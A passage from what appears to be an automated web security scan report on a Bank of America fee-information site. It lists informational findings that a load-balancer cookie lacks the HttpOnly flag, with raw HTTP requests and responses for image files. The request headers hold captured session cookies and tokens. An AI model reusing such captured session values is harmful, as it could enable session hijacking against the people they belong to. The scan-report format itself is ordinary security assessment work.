SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:04 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c1e6-13f3-4ab460c951580"
Accept-Ranges: bytes
Content-Length: 5107
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:04 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:04 GMT;path=/

GIF89a6.(....................==.....i....s".......W............................mik.QQ.................e.........yfH.hh.....C........r...7............URS....................V...........P....y$.......
...[SNIP]...

4.29. http://factsaboutfees.bankofamerica.com/assets/img/ico-glossary.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/ico-glossary.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:30 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/ico-glossary.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:30 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c20d-21d-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 541
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:30 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:30 GMT;path=/

GIF89a.......................................T.......................{..............b..........................\..............c......................._..=c..........g..j..........................z...
...[SNIP]...

4.30. http://factsaboutfees.bankofamerica.com/assets/img/ico-pdf.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/ico-pdf.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:05 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/ico-pdf.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:04 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c207-d64-4ab460c951580"
Accept-Ranges: bytes
Content-Length: 3428
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:04 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:05 GMT;path=/

GIF89a.....(......8....
..,:....co.. ..%.$0.FM.(6. +.[d.^g.S^.Y_..1.....$..)..&.....,..6. !..4../..9.y..w|.......|......................................................................................
...[SNIP]...

4.31. http://factsaboutfees.bankofamerica.com/assets/img/ico-tag.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/ico-tag.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:04 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/ico-tag.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:04 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c1f7-877-4ab460c951580"
Accept-Ranges: bytes
Content-Length: 2167
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:04 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:04 GMT;path=/

GIF89a6.)............%.....0.!5xxx........*....!6.:N.:M.%:.JX.2D.Xb.Tf.(<.......AV.2D.<M.);.1D.5H....$2.?H.>R..0..-.............jt]]].Zh......lll.Rd..1.HT..3....+;...UUU....N_....-@.......bu......z.&.
...[SNIP]...

4.32. http://factsaboutfees.bankofamerica.com/assets/img/ico_redArrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/ico_redArrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:30 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/ico_redArrow.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:30 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c204-7e-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 126
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:30 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:30 GMT;path=/

GIF89a
.
.....9I.*:.GW........,....w...........JX....P`......!.......,....
.
...+.=s....f.SB.x. ..@.@.bl........E.x.B..1,....;

4.33. http://factsaboutfees.bankofamerica.com/assets/img/infographic/201.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/infographic/201.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:30 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/infographic/201.jpg HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQ